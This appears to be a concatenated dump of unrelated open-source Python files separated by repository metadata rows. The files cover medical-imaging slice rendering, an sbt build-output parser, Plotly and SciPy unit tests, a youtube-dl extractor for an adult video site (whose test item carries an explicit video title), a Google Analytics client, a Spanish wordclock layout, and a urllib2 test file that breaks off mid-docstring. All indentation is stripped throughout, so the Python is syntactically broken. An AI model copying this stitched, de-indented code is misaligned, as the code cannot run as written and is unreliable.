# Copyright: (C) 2001 Centro de Pesquisas Renato Archer
# Homepage: http://www.softwarepublico.gov.br
# Contact: invesalius@cti.gov.br
# License: GNU - GPL 2 (LICENSE.txt/LICENCA.txt)
#--------------------------------------------------------------------------
# Este programa e software livre; voce pode redistribui-lo e/ou
# modifica-lo sob os termos da Licenca Publica Geral GNU, conforme
# publicada pela Free Software Foundation; de acordo com a versao 2
# da Licenca.
#
# Este programa eh distribuido na expectativa de ser util, mas SEM
# QUALQUER GARANTIA; sem mesmo a garantia implicita de
# COMERCIALIZACAO ou de ADEQUACAO A QUALQUER PROPOSITO EM
# PARTICULAR. Consulte a Licenca Publica Geral GNU para obter mais
# detalhes.
#--------------------------------------------------------------------------
import vtk
import wx
import invesalius.constants as const
import invesalius.data.vtk_utils as vu
BORDER_UP = 1
BORDER_DOWN = 2
BORDER_LEFT = 4
BORDER_RIGHT = 8
BORDER_ALL = BORDER_UP | BORDER_DOWN | BORDER_LEFT | BORDER_RIGHT
BORDER_NONE = 0
class SliceData(object):
def __init__(self):
self.actor = None
self.cursor = None
self.text = None
self.number = 0
self.orientation = 'AXIAL'
self.renderer = None
self.canvas_renderer = None
self.overlay_renderer = None
self.__create_text()
self.__create_box()
def __create_text(self):
colour = const.ORIENTATION_COLOUR[self.orientation]
text = vu.TextZero()
text.SetColour(colour)
text.SetSize(const.TEXT_SIZE_LARGE)
text.SetPosition(const.TEXT_POS_LEFT_DOWN_ZERO)
text.SetSymbolicSize(wx.FONTSIZE_LARGE)
#text.SetVerticalJustificationToBottom()
text.SetValue(self.number)
self.text = text
def __create_line_actor(self, line):
line_mapper = vtk.vtkPolyDataMapper2D()
line_mapper.SetInputConnection(line.GetOutputPort())
line_actor = vtk.vtkActor2D()
line_actor.SetMapper(line_mapper)
return line_actor
def __create_box(self):
xi = yi = 0.1
xf = yf = 200
line_i = vtk.vtkLineSource()
line_i.SetPoint1((xi, yi, 0))
line_i.SetPoint2((xf, yi, 0))
self.line_i = line_i
self.line_i_actor = self.__create_line_actor(line_i)
line_s = vtk.vtkLineSource()
line_s.SetPoint1((xi, yf, 0))
line_s.SetPoint2((xf, yf, 0))
self.line_s = line_s
self.line_s_actor = self.__create_line_actor(line_s)
line_l = vtk.vtkLineSource()
line_l.SetPoint1((xi, yi, 0))
line_l.SetPoint2((xi, yf, 0))
self.line_l = line_l
self.line_l_actor = self.__create_line_actor(line_l)
line_r = vtk.vtkLineSource()
line_r.SetPoint1((xf, yi, 0))
line_r.SetPoint2((xf, yf, 0))
self.line_r = line_r
self.line_r_actor = self.__create_line_actor(line_r)
box_actor = vtk.vtkPropAssembly()
box_actor.AddPart(self.line_i_actor)
box_actor.AddPart(self.line_s_actor)
box_actor.AddPart(self.line_l_actor)
box_actor.AddPart(self.line_r_actor)
self.box_actor = box_actor
def __set_border_colours(self, colours_borders):
for colour, actors in colours_borders.items():
for actor in actors:
actor.GetProperty().SetColor(colour)
def SetBorderStyle(self, style=BORDER_NONE):
colour_e = const.ORIENTATION_COLOUR[self.orientation]
colour_i = (1, 1, 1)
extern_borders = []
intern_borders = []
if style & BORDER_UP:
extern_borders.append(self.line_s_actor)
else:
intern_borders.append(self.line_s_actor)
if style & BORDER_DOWN:
extern_borders.append(self.line_i_actor)
else:
intern_borders.append(self.line_i_actor)
if style & BORDER_LEFT:
extern_borders.append(self.line_l_actor)
else:
intern_borders.append(self.line_l_actor)
if style & BORDER_RIGHT:
extern_borders.append(self.line_r_actor)
else:
intern_borders.append(self.line_r_actor)
self.__set_border_colours({colour_i: intern_borders,
colour_e: extern_borders})
def SetCursor(self, cursor):
if self.cursor:
self.overlay_renderer.RemoveActor(self.cursor.actor)
self.overlay_renderer.AddActor(cursor.actor)
self.cursor = cursor
def SetNumber(self, init, end=None):
if end is None:
self.number = init
self.text.SetValue("%d" % self.number)
else:
self.number = init
self.text.SetValue("%d - %d" % (init, end))
self.text.SetPosition(const.TEXT_POS_LEFT_DOWN_ZERO)
def SetOrientation(self, orientation):
self.orientation = orientation
colour = const.ORIENTATION_COLOUR[self.orientation]
self.text.SetColour(colour)
#self.box_actor.GetProperty().SetColor(colour)
def SetSize(self, size):
w, h = size
xi = yi = 0.1
xf = w - 0.1
yf = h - 0.1
self.line_i.SetPoint1((xi, yi, 0))
self.line_i.SetPoint2((xf, yi, 0))
self.line_s.SetPoint1((xi, yf, 0))
self.line_s.SetPoint2((xf, yf, 0))
self.line_l.SetPoint1((xi, yi, 0))
self.line_l.SetPoint2((xi, yf, 0))
self.line_r.SetPoint1((xf, yi, 0))
self.line_r.SetPoint2((xf, yf, 0))
def Hide(self):
self.overlay_renderer.RemoveActor(self.actor)
self.renderer.RemoveActor(self.text.actor)
def Show(self):
self.renderer.AddActor(self.actor)
self.renderer.AddActor(self.text.actor)
| gpl-2.0 |
jarhart/SublimeSBT | outputmon.py | 1 | 5476 | try:
from .sbterror import SbtError
from .util import maybe
except(ValueError):
from sbterror import SbtError
from util import maybe
import re
class BuildOutputMonitor(object):
def __init__(self, project):
self.project = project
self._parsers = [ErrorParser, TestFailureParser, MultilineTestFailureParser,
FinishedParser]
self._parser = None
self._buffer = ''
def __call__(self, output):
lines = re.split(r'(?:\r\n|\n|\r)', self._buffer + output)
self._buffer = lines[-1]
for line in lines[0:-1]:
self._output_line(self._strip_terminal_codes(line))
def _output_line(self, line):
if self._parser:
self._parser = self._parser.parse(line)
else:
self._parser = self._start_parsing(line)
def _start_parsing(self, line):
for parser_class in self._parsers:
for parser in parser_class.start(self.project, line):
return parser
def _strip_terminal_codes(self, line):
return re.sub(r'\033(?:M|\[[0-9;]+[mK])', '', line)
class OutputParser(object):
def parse(self, line):
self.finish()
class AbstractErrorParser(OutputParser):
def __init__(self, project, line, filename, lineno, message):
self.project = project
self.reporter = project.error_reporter
self.filename = filename
self.lineno = lineno
self.message = message
self.extra_lines = []
def finish(self):
self.reporter.error(self._error())
def _extra_line(self, line):
self.extra_lines.append(line)
def _error(self):
return SbtError(project=self.project,
filename=self.filename,
line=self.lineno,
message=self.message,
error_type=self.error_type,
extra_lines=self.extra_lines)
class ErrorParser(AbstractErrorParser):
@classmethod
def start(cls, project, line):
for m in maybe(re.match(r'^\[(error|warn)\]\s+(.+?):(\d+):(?:(\d+):)?\s+(.+)$', line)):
yield cls(project,
line=line,
label=m.group(1),
filename=m.group(2),
lineno=int(m.group(3)),
message=m.group(5))
def __init__(self, project, line, label, filename, lineno, message):
AbstractErrorParser.__init__(self, project, line, filename, lineno, message)
if label == 'warn':
self.error_type = 'warning'
else:
self.error_type = 'error'
def parse(self, line):
for t in maybe(self._match_last_line(line)):
self._extra_line(t)
return self.finish()
for t in maybe(self._match_line(line)):
self._extra_line(t)
return self
return self.finish()
def _match_last_line(self, line):
for m in maybe(re.match(r'\[(?:error|warn)\] (\s*\^\s*)$', line)):
return m.group(1)
def _match_line(self, line):
for m in maybe(re.match(r'\[(?:error|warn)\] (.*)$', line)):
return m.group(1)
class TestFailureParser(AbstractErrorParser):
# Single line failures of the form:
# [error|info] ... (filename::nn)
@classmethod
def start(cls, project, line):
for m in maybe(re.match(r'\[(?:error|info)\]\s+(.+)\s+\(([^:]+):(\d+)\)$', line)):
yield cls(project,
line=line,
filename=m.group(2),
lineno=int(m.group(3)),
message=m.group(1))
def __init__(self, project, line, filename, lineno, message):
AbstractErrorParser.__init__(self, project, line, filename, lineno, message)
self.error_type = 'failure'
class MultilineTestFailureParser(AbstractErrorParser):
# Multi-line failures of the form:
# [info] - test description here *** FAILED ***
# [info] ...
# [info] ... (filename:nn)
@classmethod
def start(cls, project, line):
for m in maybe(re.match(r'\[info\] - (.+) \*\*\* FAILED \*\*\*$', line)):
yield cls(project,
line=line,
message=m.group(1))
def __init__(self, project, line, message):
AbstractErrorParser.__init__(self, project, line, "dummy", 0, message)
self.error_type = 'error'
def parse(self, line):
for (t, filename, lineno) in maybe(self._match_last_line(line)):
self._extra_line(t)
self.filename = filename
self.lineno = lineno
return self.finish()
for t in maybe(self._match_line(line)):
self._extra_line(t)
return self
return self.finish()
def _match_last_line(self, line):
for m in maybe(re.match(r'\[info\] (.+) \(([^:]+):(\d+)\)$', line)):
return (m.group(1), m.group(2), int(m.group(3)))
def _match_line(self, line):
for m in maybe(re.match(r'\[info\] (.*)$', line)):
return m.group(1)
class FinishedParser(OutputParser):
@classmethod
def start(cls, project, line):
if re.match(r'\[(?:success|error)\] Total time:', line):
yield cls(project)
def __init__(self, project):
self.reporter = project.error_reporter
def finish(self):
self.reporter.finish()
| mit |
plotly/plotly.py | packages/python/chart-studio/chart_studio/tests/test_plot_ly/test_api/test_v2/test_folders.py | 2 | 4118 | from __future__ import absolute_import
from chart_studio.api.v2 import folders
from chart_studio.tests.test_plot_ly.test_api import PlotlyApiTestCase
class FoldersTest(PlotlyApiTestCase):
def setUp(self):
super(FoldersTest, self).setUp()
# Mock the actual api call, we don't want to do network tests here.
self.request_mock = self.mock("chart_studio.api.v2.utils.requests.request")
self.request_mock.return_value = self.get_response()
# Mock the validation function since we can test that elsewhere.
self.mock("chart_studio.api.v2.utils.validate_response")
def test_create(self):
path = "/foo/man/bar/"
folders.create({"path": path})
assert self.request_mock.call_count == 1
args, kwargs = self.request_mock.call_args
method, url = args
self.assertEqual(method, "post")
self.assertEqual(url, "{}/v2/folders".format(self.plotly_api_domain))
self.assertEqual(kwargs["data"], '{{"path": "{}"}}'.format(path))
def test_retrieve(self):
folders.retrieve("hodor:88")
assert self.request_mock.call_count == 1
args, kwargs = self.request_mock.call_args
method, url = args
self.assertEqual(method, "get")
self.assertEqual(url, "{}/v2/folders/hodor:88".format(self.plotly_api_domain))
self.assertEqual(kwargs["params"], {})
def test_retrieve_share_key(self):
folders.retrieve("hodor:88", share_key="foobar")
assert self.request_mock.call_count == 1
args, kwargs = self.request_mock.call_args
method, url = args
self.assertEqual(method, "get")
self.assertEqual(url, "{}/v2/folders/hodor:88".format(self.plotly_api_domain))
self.assertEqual(kwargs["params"], {"share_key": "foobar"})
def test_update(self):
new_filename = "..zzZ ..zzZ"
folders.update("hodor:88", body={"filename": new_filename})
assert self.request_mock.call_count == 1
args, kwargs = self.request_mock.call_args
method, url = args
self.assertEqual(method, "put")
self.assertEqual(url, "{}/v2/folders/hodor:88".format(self.plotly_api_domain))
self.assertEqual(kwargs["data"], '{{"filename": "{}"}}'.format(new_filename))
def test_trash(self):
folders.trash("hodor:88")
assert self.request_mock.call_count == 1
args, kwargs = self.request_mock.call_args
method, url = args
self.assertEqual(method, "post")
self.assertEqual(
url, "{}/v2/folders/hodor:88/trash".format(self.plotly_api_domain)
)
def test_restore(self):
folders.restore("hodor:88")
assert self.request_mock.call_count == 1
args, kwargs = self.request_mock.call_args
method, url = args
self.assertEqual(method, "post")
self.assertEqual(
url, "{}/v2/folders/hodor:88/restore".format(self.plotly_api_domain)
)
def test_permanent_delete(self):
folders.permanent_delete("hodor:88")
assert self.request_mock.call_count == 1
args, kwargs = self.request_mock.call_args
method, url = args
self.assertEqual(method, "delete")
self.assertEqual(
url,
"{}/v2/folders/hodor:88/permanent_delete".format(self.plotly_api_domain),
)
def test_lookup(self):
# requests does urlencode, so don't worry about the `' '` character!
path = "/mah folder"
parent = 43
user = "someone"
exists = True
folders.lookup(path=path, parent=parent, user=user, exists=exists)
assert self.request_mock.call_count == 1
args, kwargs = self.request_mock.call_args
method, url = args
expected_params = {
"path": path,
"parent": parent,
"exists": "true",
"user": user,
}
self.assertEqual(method, "get")
self.assertEqual(url, "{}/v2/folders/lookup".format(self.plotly_api_domain))
self.assertEqual(kwargs["params"], expected_params)
| mit |
pizzathief/scipy | scipy/special/tests/test_owens_t.py | 21 | 1323 | import numpy as np
from numpy.testing import assert_equal, assert_allclose
import scipy.special as sc
def test_symmetries():
np.random.seed(1234)
a, h = np.random.rand(100), np.random.rand(100)
assert_equal(sc.owens_t(h, a), sc.owens_t(-h, a))
assert_equal(sc.owens_t(h, a), -sc.owens_t(h, -a))
def test_special_cases():
assert_equal(sc.owens_t(5, 0), 0)
assert_allclose(sc.owens_t(0, 5), 0.5*np.arctan(5)/np.pi,
rtol=5e-14)
# Target value is 0.5*Phi(5)*(1 - Phi(5)) for Phi the CDF of the
# standard normal distribution
assert_allclose(sc.owens_t(5, 1), 1.4332574485503512543e-07,
rtol=5e-14)
def test_nans():
assert_equal(sc.owens_t(20, np.nan), np.nan)
assert_equal(sc.owens_t(np.nan, 20), np.nan)
assert_equal(sc.owens_t(np.nan, np.nan), np.nan)
def test_infs():
h = 1
res = 0.5*sc.erfc(h/np.sqrt(2))
assert_allclose(sc.owens_t(h, np.inf), res, rtol=5e-14)
assert_allclose(sc.owens_t(h, -np.inf), -res, rtol=5e-14)
assert_equal(sc.owens_t(np.inf, 1), 0)
assert_equal(sc.owens_t(-np.inf, 1), 0)
assert_equal(sc.owens_t(np.inf, np.inf), 0)
assert_equal(sc.owens_t(-np.inf, np.inf), 0)
assert_equal(sc.owens_t(np.inf, -np.inf), -0.0)
assert_equal(sc.owens_t(-np.inf, -np.inf), -0.0)
| bsd-3-clause |
donutmonger/youtube-dl | youtube_dl/extractor/extremetube.py | 102 | 2513 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..compat import (
compat_parse_qs,
compat_urllib_request,
)
from ..utils import (
qualities,
str_to_int,
)
class ExtremeTubeIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?(?P<url>extremetube\.com/.*?video/.+?(?P<id>[0-9]+))(?:[/?&]|$)'
_TESTS = [{
'url': 'http://www.extremetube.com/video/music-video-14-british-euro-brit-european-cumshots-swallow-652431',
'md5': '344d0c6d50e2f16b06e49ca011d8ac69',
'info_dict': {
'id': '652431',
'ext': 'mp4',
'title': 'Music Video 14 british euro brit european cumshots swallow',
'uploader': 'unknown',
'view_count': int,
'age_limit': 18,
}
}, {
'url': 'http://www.extremetube.com/gay/video/abcde-1234',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
url = 'http://www.' + mobj.group('url')
req = compat_urllib_request.Request(url)
req.add_header('Cookie', 'age_verified=1')
webpage = self._download_webpage(req, video_id)
video_title = self._html_search_regex(
r'<h1 [^>]*?title="([^"]+)"[^>]*>', webpage, 'title')
uploader = self._html_search_regex(
r'Uploaded by:\s*</strong>\s*(.+?)\s*</div>',
webpage, 'uploader', fatal=False)
view_count = str_to_int(self._html_search_regex(
r'Views:\s*</strong>\s*<span>([\d,\.]+)</span>',
webpage, 'view count', fatal=False))
flash_vars = compat_parse_qs(self._search_regex(
r'<param[^>]+?name="flashvars"[^>]+?value="([^"]+)"', webpage, 'flash vars'))
formats = []
quality = qualities(['180p', '240p', '360p', '480p', '720p', '1080p'])
for k, vals in flash_vars.items():
m = re.match(r'quality_(?P<quality>[0-9]+p)$', k)
if m is not None:
formats.append({
'format_id': m.group('quality'),
'quality': quality(m.group('quality')),
'url': vals[0],
})
self._sort_formats(formats)
return {
'id': video_id,
'title': video_title,
'formats': formats,
'uploader': uploader,
'view_count': view_count,
'age_limit': 18,
}
| unlicense |
BeATz-UnKNoWN/python-for-android | python-build/python-libs/gdata/build/lib/gdata/analytics/service.py | 213 | 13293 | #!/usr/bin/python
#
# Copyright (C) 2006 Google Inc.
# Refactored in 2009 to work for Google Analytics by Sal Uryasev at Juice Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
AccountsService extends the GDataService to streamline Google Analytics
account information operations.
AnalyticsDataService: Provides methods to query google analytics data feeds.
Extends GDataService.
DataQuery: Queries a Google Analytics Data list feed.
AccountQuery: Queries a Google Analytics Account list feed.
"""
__author__ = 'api.suryasev (Sal Uryasev)'
import urllib
import atom
import gdata.service
import gdata.analytics
class AccountsService(gdata.service.GDataService):
"""Client extension for the Google Analytics Account List feed."""
def __init__(self, email="", password=None, source=None,
server='www.google.com/analytics', additional_headers=None,
**kwargs):
"""Creates a client for the Google Analytics service.
Args:
email: string (optional) The user's email address, used for
authentication.
password: string (optional) The user's password.
source: string (optional) The name of the user's application.
server: string (optional) The name of the server to which a connection
will be opened.
**kwargs: The other parameters to pass to gdata.service.GDataService
constructor.
"""
gdata.service.GDataService.__init__(
self, email=email, password=password, service='analytics',
source=source, server=server, additional_headers=additional_headers,
**kwargs)
def QueryAccountListFeed(self, uri):
"""Retrieves an AccountListFeed by retrieving a URI based off the Document
List feed, including any query parameters. An AccountListFeed object
can be used to construct these parameters.
Args:
uri: string The URI of the feed being retrieved possibly with query
parameters.
Returns:
An AccountListFeed object representing the feed returned by the server.
"""
return self.Get(uri, converter=gdata.analytics.AccountListFeedFromString)
def GetAccountListEntry(self, uri):
"""Retrieves a particular AccountListEntry by its unique URI.
Args:
uri: string The unique URI of an entry in an Account List feed.
Returns:
An AccountLisFeed object representing the retrieved entry.
"""
return self.Get(uri, converter=gdata.analytics.AccountListEntryFromString)
def GetAccountList(self, max_results=1000, text_query=None,
params=None, categories=None):
"""Retrieves a feed containing all of a user's accounts and profiles."""
q = gdata.analytics.service.AccountQuery(max_results=max_results,
text_query=text_query,
params=params,
categories=categories);
return self.QueryAccountListFeed(q.ToUri())
class AnalyticsDataService(gdata.service.GDataService):
"""Client extension for the Google Analytics service Data List feed."""
def __init__(self, email=None, password=None, source=None,
server='www.google.com/analytics', additional_headers=None,
**kwargs):
"""Creates a client for the Google Analytics service.
Args:
email: string (optional) The user's email address, used for
authentication.
password: string (optional) The user's password.
source: string (optional) The name of the user's application.
server: string (optional) The name of the server to which a connection
will be opened. Default value: 'docs.google.com'.
**kwargs: The other parameters to pass to gdata.service.GDataService
constructor.
"""
gdata.service.GDataService.__init__(self,
email=email, password=password, service='analytics', source=source,
server=server, additional_headers=additional_headers, **kwargs)
def GetData(self, ids='', dimensions='', metrics='',
sort='', filters='', start_date='',
end_date='', start_index='',
max_results=''):
"""Retrieves a feed containing a user's data
ids: comma-separated string of analytics accounts.
dimensions: comma-separated string of dimensions.
metrics: comma-separated string of metrics.
sort: comma-separated string of dimensions and metrics for sorting.
This may be previxed with a minus to sort in reverse order.
(e.g. '-ga:keyword')
If ommited, the first dimension passed in will be used.
filters: comma-separated string of filter parameters.
(e.g. 'ga:keyword==google')
start_date: start date for data pull.
end_date: end date for data pull.
start_index: used in combination with max_results to pull more than 1000
entries. This defaults to 1.
max_results: maximum results that the pull will return. This defaults
to, and maxes out at 1000.
"""
q = gdata.analytics.service.DataQuery(ids=ids,
dimensions=dimensions,
metrics=metrics,
filters=filters,
sort=sort,
start_date=start_date,
end_date=end_date,
start_index=start_index,
max_results=max_results);
return self.AnalyticsDataFeed(q.ToUri())
def AnalyticsDataFeed(self, uri):
"""Retrieves an AnalyticsListFeed by retrieving a URI based off the
Document List feed, including any query parameters. An
AnalyticsListFeed object can be used to construct these parameters.
Args:
uri: string The URI of the feed being retrieved possibly with query
parameters.
Returns:
An AnalyticsListFeed object representing the feed returned by the
server.
"""
return self.Get(uri,
converter=gdata.analytics.AnalyticsDataFeedFromString)
"""
Account Fetching
"""
def QueryAccountListFeed(self, uri):
"""Retrieves an Account ListFeed by retrieving a URI based off the Account
List feed, including any query parameters. A AccountQuery object can
be used to construct these parameters.
Args:
uri: string The URI of the feed being retrieved possibly with query
parameters.
Returns:
An AccountListFeed object representing the feed returned by the server.
"""
return self.Get(uri, converter=gdata.analytics.AccountListFeedFromString)
def GetAccountListEntry(self, uri):
"""Retrieves a particular AccountListEntry by its unique URI.
Args:
uri: string The unique URI of an entry in an Account List feed.
Returns:
An AccountListEntry object representing the retrieved entry.
"""
return self.Get(uri, converter=gdata.analytics.AccountListEntryFromString)
def GetAccountList(self, username="default", max_results=1000,
start_index=1):
"""Retrieves a feed containing all of a user's accounts and profiles.
The username parameter is soon to be deprecated, with 'default'
becoming the only allowed parameter.
"""
if not username:
raise Exception("username is a required parameter")
q = gdata.analytics.service.AccountQuery(username=username,
max_results=max_results,
start_index=start_index);
return self.QueryAccountListFeed(q.ToUri())
class DataQuery(gdata.service.Query):
"""Object used to construct a URI to a data feed"""
def __init__(self, feed='/feeds/data', text_query=None,
params=None, categories=None, ids="",
dimensions="", metrics="", sort="", filters="",
start_date="", end_date="", start_index="",
max_results=""):
"""Constructor for Analytics List Query
Args:
feed: string (optional) The path for the feed. (e.g. '/feeds/data')
text_query: string (optional) The contents of the q query parameter.
This string is URL escaped upon conversion to a URI.
params: dict (optional) Parameter value string pairs which become URL
params when translated to a URI. These parameters are added to
the query's items.
categories: list (optional) List of category strings which should be
included as query categories. See gdata.service.Query for
additional documentation.
ids: comma-separated string of analytics accounts.
dimensions: comma-separated string of dimensions.
metrics: comma-separated string of metrics.
sort: comma-separated string of dimensions and metrics.
This may be previxed with a minus to sort in reverse order
(e.g. '-ga:keyword').
If ommited, the first dimension passed in will be used.
filters: comma-separated string of filter parameters
(e.g. 'ga:keyword==google').
start_date: start date for data pull.
end_date: end date for data pull.
start_index: used in combination with max_results to pull more than 1000
entries. This defaults to 1.
max_results: maximum results that the pull will return. This defaults
to, and maxes out at 1000.
Yields:
A DocumentQuery object used to construct a URI based on the Document
List feed.
"""
self.elements = {'ids': ids,
'dimensions': dimensions,
'metrics': metrics,
'sort': sort,
'filters': filters,
'start-date': start_date,
'end-date': end_date,
'start-index': start_index,
'max-results': max_results}
gdata.service.Query.__init__(self, feed, text_query, params, categories)
def ToUri(self):
"""Generates a URI from the query parameters set in the object.
Returns:
A string containing the URI used to retrieve entries from the Analytics
List feed.
"""
old_feed = self.feed
self.feed = '/'.join([old_feed]) + '?' + \
urllib.urlencode(dict([(key, value) for key, value in \
self.elements.iteritems() if value]))
new_feed = gdata.service.Query.ToUri(self)
self.feed = old_feed
return new_feed
class AccountQuery(gdata.service.Query):
"""Object used to construct a URI to query the Google Account List feed"""
def __init__(self, feed='/feeds/accounts', start_index=1,
max_results=1000, username='default', text_query=None,
params=None, categories=None):
"""Constructor for Account List Query
Args:
feed: string (optional) The path for the feed. (e.g. '/feeds/documents')
visibility: string (optional) The visibility chosen for the current
feed.
projection: string (optional) The projection chosen for the current
feed.
text_query: string (optional) The contents of the q query parameter.
This string is URL escaped upon conversion to a URI.
params: dict (optional) Parameter value string pairs which become URL
params when translated to a URI. These parameters are added to
the query's items.
categories: list (optional) List of category strings which should be
included as query categories. See gdata.service.Query for
additional documentation.
username: string (deprecated) This value should now always be passed as
'default'.
Yields:
A DocumentQuery object used to construct a URI based on the Document
List feed.
"""
self.max_results = max_results
self.start_index = start_index
self.username = username
gdata.service.Query.__init__(self, feed, text_query, params, categories)
def ToUri(self):
"""Generates a URI from the query parameters set in the object.
Returns:
A string containing the URI used to retrieve entries from the Account
List feed.
"""
old_feed = self.feed
self.feed = '/'.join([old_feed, self.username]) + '?' + \
'&'.join(['max-results=' + str(self.max_results),
'start-index=' + str(self.start_index)])
new_feed = self.feed
self.feed = old_feed
return new_feed
| apache-2.0 |
elParaguayo/RPi-InfoScreen-Kivy | screens/wordclock/layouts/spanish.py | 2 | 3577 | '''This is a custom layout for the RPi InfoScreen wordclock screen.
Custom layouts can be created for the screen by creating a new file in the
"layouts" folder.
Each layout must have the following variables:
LAYOUT: The grid layout. Must be a single string.
MAP: The mapping required for various times (see notes below)
COLS: The number of columns required for the grid layout
SIZE: The size of the individual box containing your letter.
Tuple in (x, y) format.
FONTSIZE: Font size for the letter
'''
# Layout is a single string variable which will be looped over by the parser.
LAYOUT = ("ESONPLASWUNADOS"
"TRESCUATROCINCO"
"SEISIETEOCHONCE"
"NUEVESDIEZVDOCE"
"YMENOSQCINCORPI"
"DIEZTRCUARTOELP"
"VEINTEBMEDIALZI"
"RPIVEINTICINCOR"
)
# Map instructions:
# The clock works by rounding the time to the nearest 5 minutes.
# This means that you need to have settngs for each five minute interval "m00"
# "m00", "m05".
# The clock also works on a 12 hour basis rather than 24 hour:
# "h00", "h01" etc.
# There are three optional parameters:
# "all": Anything that is always shown regardless of the time e.g. "It is..."
# "am": Wording/symbol to indicate morning.
# "pm": Wording/symbol to indicate afternoon/evening
MAP = {
"all": [],
"m00": [],
"m05": [60, 67, 68, 69, 70, 71],
"m10": [60, 75, 76, 77, 78],
"m15": [60, 81, 82, 83, 84, 85, 86],
"m20": [60, 90, 91, 92, 93, 94, 95],
"m25": [60, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118],
"m30": [60, 97, 98, 99, 100, 101],
"m35": [61, 62, 63, 64, 65, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118],
"m40": [61, 62, 63, 64, 65, 90, 91, 92, 93, 94, 95],
"m45": [61, 62, 63, 64, 65, 81, 82, 83, 84, 85, 86],
"m50": [61, 62, 63, 64, 65, 75, 76, 77, 78],
"m55": [61, 62, 63, 64, 65, 67, 68, 69, 70, 71],
"h01": [0, 1, 5, 6, 9, 10, 11],
"h02": [1, 2, 3, 5, 6, 7, 12, 13, 14],
"h03": [1, 2, 3, 5, 6, 7, 15, 16, 17, 18],
"h04": [1, 2, 3, 5, 6, 7, 19, 20, 21, 22, 23, 24],
"h05": [1, 2, 3, 5, 6, 7, 25, 26, 27, 28, 29],
"h06": [1, 2, 3, 5, 6, 7, 30, 31, 32, 33],
"h07": [1, 2, 3, 5, 6, 7, 33, 34, 35, 36, 37],
"h08": [1, 2, 3, 5, 6, 7, 38, 39, 40, 41],
"h09": [1, 2, 3, 5, 6, 7, 45, 46, 47, 48, 49],
"h10": [1, 2, 3, 5, 6, 7, 51, 52, 53, 54],
"h11": [1, 2, 3, 5, 6, 7, 41, 42, 43, 44],
"h12": [1, 2, 3, 5, 6, 7, 56, 57, 58, 59],
"m00": [],
"m05": [60, 67, 68, 69, 70, 71],
"m10": [60, 75, 76, 77, 78],
"m15": [60, 81, 82, 83, 84, 85, 86],
"m20": [60, 90, 91, 92, 93, 94, 95],
"m25": [60, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118],
"m30": [60, 97, 98, 99, 100, 101],
"m35": [61, 62, 63, 64, 65, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118],
"m40": [61, 62, 63, 64, 65, 90, 91, 92, 93, 94, 95],
"m45": [61, 62, 63, 64, 65, 81, 82, 83, 84, 85, 86],
"m50": [61, 62, 63, 64, 65, 75, 76, 77, 78],
"m55": [61, 62, 63, 64, 65, 67, 68, 69, 70, 71],
"am": [],
"pm": []
}
# Number of columns in grid layout
COLS = 15
# Size of letter in grid (x, y)
SIZE = (53, 60)
# Font size of letter
FONTSIZE = 40
# Is our language one where we need to increment the hour after 30 mins
# e.g. 9:40 is "Twenty to ten"
HOUR_INCREMENT = True
HOUR_INCREMENT_TIME = 30
| gpl-3.0 |
kerr-huang/SL4A | python/src/Lib/test/test_urllib2.py | 48 | 45551 | import unittest
from test import test_support
import os
import socket
import StringIO
import urllib2
from urllib2 import Request, OpenerDirector
# XXX
# Request
# CacheFTPHandler (hard to write)
# parse_keqv_list, parse_http_list, HTTPDigestAuthHandler
class TrivialTests(unittest.TestCase):
def test_trivial(self):
# A couple trivial tests
self.assertRaises(ValueError, urllib2.urlopen, 'bogus url')
# XXX Name hacking to get this to work on Windows.
fname = os.path.abspath(urllib2.__file__).replace('\\', '/')
if fname[1:2] == ":":
fname = fname[2:]
# And more hacking to get it to work on MacOS. This assumes
# urllib.pathname2url works, unfortunately...
if os.name == 'mac':
fname = '/' + fname.replace(':', '/')
elif os.name == 'riscos':
import string
fname = os.expand(fname)
fname = fname.translate(string.maketrans("/.", "./"))
file_url = "file://%s" % fname
f = urllib2.urlopen(file_url)
buf = f.read()
f.close()
def test_parse_http_list(self):
tests = [('a,b,c', ['a', 'b', 'c']),
('path"o,l"og"i"cal, example', ['path"o,l"og"i"cal', 'example']),
('a, b, "c", "d", "e,f", g, h', ['a', 'b', '"c"', '"d"', '"e,f"', 'g', 'h']),
('a="b\\"c", d="e\\,f", g="h\\\\i"', ['a="b"c"', 'd="e,f"', 'g="h\\i"'])]
for string, list in tests:
self.assertEquals(urllib2.parse_http_list(string), list)
def test_request_headers_dict():
"""
The Request.headers dictionary is not a documented interface. It should
stay that way, because the complete set of headers are only accessible
through the .get_header(), .has_header(), .header_items() interface.
However, .headers pre-dates those methods, and so real code will be using
the dictionary.
The introduction in 2.4 of those methods was a mistake for the same reason:
code that previously saw all (urllib2 user)-provided headers in .headers
now sees only a subset (and the function interface is ugly and incomplete).
A better change would have been to replace .headers dict with a dict
subclass (or UserDict.DictMixin instance?) that preserved the .headers
interface and also provided access to the "unredirected" headers. It's
probably too late to fix that, though.
Check .capitalize() case normalization:
>>> url = "http://example.com"
>>> Request(url, headers={"Spam-eggs": "blah"}).headers["Spam-eggs"]
'blah'
>>> Request(url, headers={"spam-EggS": "blah"}).headers["Spam-eggs"]
'blah'
Currently, Request(url, "Spam-eggs").headers["Spam-Eggs"] raises KeyError,
but that could be changed in future.
"""
def test_request_headers_methods():
"""
Note the case normalization of header names here, to .capitalize()-case.
This should be preserved for backwards-compatibility. (In the HTTP case,
normalization to .title()-case is done by urllib2 before sending headers to
httplib).
>>> url = "http://example.com"
>>> r = Request(url, headers={"Spam-eggs": "blah"})
>>> r.has_header("Spam-eggs")
True
>>> r.header_items()
[('Spam-eggs', 'blah')]
>>> r.add_header("Foo-Bar", "baz")
>>> items = r.header_items()
>>> items.sort()
>>> items
[('Foo-bar', 'baz'), ('Spam-eggs', 'blah')]
Note that e.g. r.has_header("spam-EggS") is currently False, and
